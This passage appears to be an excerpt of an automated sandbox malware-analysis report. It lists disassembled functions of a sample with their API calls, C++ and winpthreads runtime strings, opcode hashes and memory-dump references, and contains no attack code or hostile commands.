                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$strlen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                              • API String ID: 2619041689-4063909124
                              • Opcode ID: 23b571477e59656f2c54205e3a469d0ecd659db46025959dfe6bb4fa3c52ed1d
                              • Instruction ID: 1b7b0a6c9f8dd651e3ce22a68559d480f8c25ef2cb4e268f12222a614f67a323
                              • Opcode Fuzzy Hash: 23b571477e59656f2c54205e3a469d0ecd659db46025959dfe6bb4fa3c52ed1d
                              • Instruction Fuzzy Hash: AEA1F862B08A65A0EF75AF25D4501BCA310AB41FA4FC44633DE9E67BD1CE2DD542D322
                              Function 00007FF733AC01F0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 240stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen
                              • String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
                              • API String ID: 39653677-1250104765
                              • Opcode ID: 31d7b033c2b6cc8b0687ad37913904ee7a5ac846cc328ab8a4fee98c217424b5
                              • Instruction ID: f3b334322714dcbbb91c7b9ec7dfabba30a088f5d3c3cfb7ecc3aaf88355657c
                              • Opcode Fuzzy Hash: 31d7b033c2b6cc8b0687ad37913904ee7a5ac846cc328ab8a4fee98c217424b5
                              • Instruction Fuzzy Hash: DE51CB52B49B1961EDA9FB1AE4500ECA350FB44F94BC80432DE5D27761DE3CE987E310
                              Function 00007FF733B01230 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 215COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B014EC
                                • Part of subcall function 00007FF733B01FD0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF733B00A22,?,?,?,?,?,?,?,00007FF733B0042B), ref: 00007FF733B0205A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                              • API String ID: 3510742995-1339558951
                              • Opcode ID: b38b7cdd1f4c764948d9d68dd2aed16825657903a724257c28d56afd645457c1
                              • Instruction ID: d8e200b147e3bb76313d542cf121079b3e97fb637f99261918e8a293bd913a74
                              • Opcode Fuzzy Hash: b38b7cdd1f4c764948d9d68dd2aed16825657903a724257c28d56afd645457c1
                              • Instruction Fuzzy Hash: B251D65AB0A655A0FEA96B5694048BC92519F44FD4FC84132EF4D6F7E0EF2CE481E323
                              Function 00007FF733ABE270 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 216stringCOMMON
                              Download Yara Rule
                              APIs
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733ABE299
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733ABE2BA
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733ABE346
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733ABE3C8
                                • Part of subcall function 00007FF733B45E40: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000,00007FF733AB357F,?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7), ref: 00007FF733B45E5B
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733ABE471
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcmp$strlen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                              • API String ID: 3738950036-1697194757
                              • Opcode ID: ecc8a17b8e953fb4b94ea63def50e3dc53dffbf29ffe69af40b1d063431c2873
                              • Instruction ID: 755a72a2d14932bab3aeb53e40f49360d61bd8f803718ace7f96802b38840c1e
                              • Opcode Fuzzy Hash: ecc8a17b8e953fb4b94ea63def50e3dc53dffbf29ffe69af40b1d063431c2873
                              • Instruction Fuzzy Hash: 1251F992B04996A1FFA4AB26FC009E492419F55BE0FCC4232FD6C773E5DE1CE985E214
                              Function 00007FF733AB3A60 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON
                              Download Yara Rule
                              APIs
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733AB3A8A
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733AB3AA8
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733AB3B36
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733AB3BB8
                                • Part of subcall function 00007FF733B45E40: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000,00007FF733AB357F,?,?,?,?,?,00000000,00007FF733B146BF,?,-00000007,00007FF733ABB7B7), ref: 00007FF733B45E5B
                              • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733AB3C64
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcmp$strlen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                              • API String ID: 3738950036-1697194757
                              • Opcode ID: 8d7a7b5a469c073ece1f2a30adabfb64eb78ec0ac69f30a0bac384a213563cb9
                              • Instruction ID: 9bb90a3c1c183a2c89b3af7703cf497cad8d5b1864791384faa7a95604918ba2
                              • Opcode Fuzzy Hash: 8d7a7b5a469c073ece1f2a30adabfb64eb78ec0ac69f30a0bac384a213563cb9
                              • Instruction Fuzzy Hash: F3511BA2F05996A1FEA0BA26EC046E493409F05BE0FD84632EE2C773D5DD6CD985D320
                              Function 00007FF733AAA350 Relevance: 10.6, APIs: 7, Instructions: 123COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocValue
                              • String ID:
                              • API String ID: 1189806713-0
                              • Opcode ID: 5fbf9f3ff5b499f3a0e2b5a193fabd22b9a719d46f93e9aa35e91b562c777f4d
                              • Instruction ID: a06804ee47b4623afe3eb4d14913a479e7577fa990a235b0554c550699229501
                              • Opcode Fuzzy Hash: 5fbf9f3ff5b499f3a0e2b5a193fabd22b9a719d46f93e9aa35e91b562c777f4d
                              • Instruction Fuzzy Hash: 9B41A223E0E14266FAF577245805ABCD2D09F44B55F880538FD3E262D2EE2CB881F2B1
                              Function 00007FF733AA9E50 Relevance: 10.6, APIs: 7, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocValue
                              • String ID:
                              • API String ID: 290111860-0
                              • Opcode ID: 8187c867aae757e7541f8cf5f048313b65bfebcb792144a0b478d9c2689cf8e8
                              • Instruction ID: f5894ee86cacda9e5ef661a600fbb4afc4053ac9b9582c07078a3bdafcc237c8
                              • Opcode Fuzzy Hash: 8187c867aae757e7541f8cf5f048313b65bfebcb792144a0b478d9c2689cf8e8
                              • Instruction Fuzzy Hash: 4631D723A0864665EBB6BB3998449BDE391FF48745F844134FD1D27356EE3CE441E390
                              Function 00007FF733AAA0E0 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseHandleValue$_endthreadexlongjmp
                              • String ID:
                              • API String ID: 3990644698-0
                              • Opcode ID: 8ecfd49468bb6581bf5770d7a2c307946c2a83daa8b0457406fddcbee9d5e9b2
                              • Instruction ID: a4918f9e21403c19f78df5182b07ca90fb6f095bdc4e672b5cd767f17c01401e
                              • Opcode Fuzzy Hash: 8ecfd49468bb6581bf5770d7a2c307946c2a83daa8b0457406fddcbee9d5e9b2
                              • Instruction Fuzzy Hash: 2D218172A09642A2FBF5AF20D810778B6E0EF48F15F884034DA4D67390DF3CA844E361
                              Function 00007FF733AAB7D0 Relevance: 10.5, APIs: 7, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleOpen_errno
                              • String ID:
                              • API String ID: 2250453136-0
                              • Opcode ID: 354446cfd6f0a3eb1270032bceb2dc8d28c976d495fb55ed2ccd016b15cddafa
                              • Instruction ID: c92e7a70a6ece794499980ef0827286a1b5c868edb5a15d83d85d0de5232f16e
                              • Opcode Fuzzy Hash: 354446cfd6f0a3eb1270032bceb2dc8d28c976d495fb55ed2ccd016b15cddafa
                              • Instruction Fuzzy Hash: BF019622A1E603A6FBF53F69588053891D0DF08B26FC44034D96E653A0DE7C3449B271
                              Function 00007FF733B35830 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 166stringCOMMON
                              Download Yara Rule
                              APIs
                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B35843
                                • Part of subcall function 00007FF733B33B10: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B33B9E
                                • Part of subcall function 00007FF733B33B10: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B33BBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$strlen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
                              • API String ID: 2619041689-3350440205
                              • Opcode ID: cf8d23dc8107e74e7d5283e79bff17c9cdf09d533787a9847005571140e43728
                              • Instruction ID: 302bccaac8f06dc94312cf925f74a35d376cda5cc2016c3ab449265bb25bffe3
                              • Opcode Fuzzy Hash: cf8d23dc8107e74e7d5283e79bff17c9cdf09d533787a9847005571140e43728
                              • Instruction Fuzzy Hash: A14138A2F09AA5A1FAA0BB56E8104E5A311EB55BD4FC04133DDCC27B61EF3CE541D721
                              Function 00007FF733B39680 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 164COMMON
                              Download Yara Rule
                              APIs
                              • wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B39693
                                • Part of subcall function 00007FF733B37CE0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B37D6F
                                • Part of subcall function 00007FF733B37CE0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF733B37D8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$wcslen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
                              • API String ID: 1844840824-3350440205
                              • Opcode ID: 42b9101714e94802e46589068f85a96034fe6e6eb9380c9eecd448550198fd54
                              • Instruction ID: 67f8a5c4aff200cd8fb5da1db7dff0038dfaaa4d03ad1d0e44d422a9d4990916
                              • Opcode Fuzzy Hash: 42b9101714e94802e46589068f85a96034fe6e6eb9380c9eecd448550198fd54
                              • Instruction Fuzzy Hash: 234149A2E05A65A1FA60FB69E8014E9A311BB59BD0FC04133ED8C27B61DF2DE550D721
                              Function 00007FF733B3FEF0 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func
                              • String ID:
                              • API String ID: 711238415-0
                              • Opcode ID: 289fa0773e1aaf89de99a5567bd43f669e47fbb6d5a711b2596d61a88740461d
                              • Instruction ID: ab08a0e11429e6b6e641a795b6b18957b9140d80e941040a094475e6db0abb13
                              • Opcode Fuzzy Hash: 289fa0773e1aaf89de99a5567bd43f669e47fbb6d5a711b2596d61a88740461d
                              • Instruction Fuzzy Hash: 82518675B1861661FAA0BB15E860379E711AF84BC4FC04433DCCE677A5CE2DE842A362
                              Function 00007FF733AA93B0 Relevance: 9.1, APIs: 6, Instructions: 97sleepthreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Value$AllocCloseCurrentHandleSleepThread_endthreadex
                              • String ID:
                              • API String ID: 3976303954-0
                              • Opcode ID: 6834b20c905296622f767eb14e7ee63f97deea4ce663f76fe78825bda46752e3
                              • Instruction ID: 231407d57a27cf6925ea862a74296d7fc5c5758b430a2e361f34d1a4bf1f294b
                              • Opcode Fuzzy Hash: 6834b20c905296622f767eb14e7ee63f97deea4ce663f76fe78825bda46752e3
                              • Instruction Fuzzy Hash: FB417562A08746A6FBA4BF25D8505B8A764FF44B90F841435E92E273A1DF3CE404E3A1
                              Function 00007FF733AA9050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733AA8950: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF733AA9070,?,?,?,00000000,00007FF733AAA089,?,?,?,?,00007FF733AAC27F), ref: 00007FF733AA89E7
                              • TlsAlloc.KERNEL32 ref: 00007FF733AA9089
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733AA90E2
                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00007FF733AAA089,?,?,?,?,00007FF733AAC27F), ref: 00007FF733B4B836
                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00007FF733AAA089,?,?,?,?,00007FF733AAC27F), ref: 00007FF733B4B83C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: abort$Alloc__acrt_iob_funccalloc
                              • String ID: once %p is %d
                              • API String ID: 2966039628-95064319
                              • Opcode ID: 9e8f998745ab9120756ac90cc179c4fbf968d3c4edfe7d7539d78d6c89989571
                              • Instruction ID: 5207708c52261f47bc6ce84273c93d503085b79763babca0411f783f05c3540d
                              • Opcode Fuzzy Hash: 9e8f998745ab9120756ac90cc179c4fbf968d3c4edfe7d7539d78d6c89989571
                              • Instruction Fuzzy Hash: 4521CF33E0E606B5F5F4BB19A8006B8E394AF457D1FC40538ED9D373A1DE2CA448A361
                              Function 00007FF733AAB980 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func
                              • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                              • API String ID: 711238415-3651547468
                              • Opcode ID: cf357945e07ecb3cb17188ebfda482f4cdcf1254a889b60975131b1a0cd5eef0
                              • Instruction ID: e681df879c75bbbed498c93d8cac8b271a200c45b07e2885ad02c7a0ba40d7eb
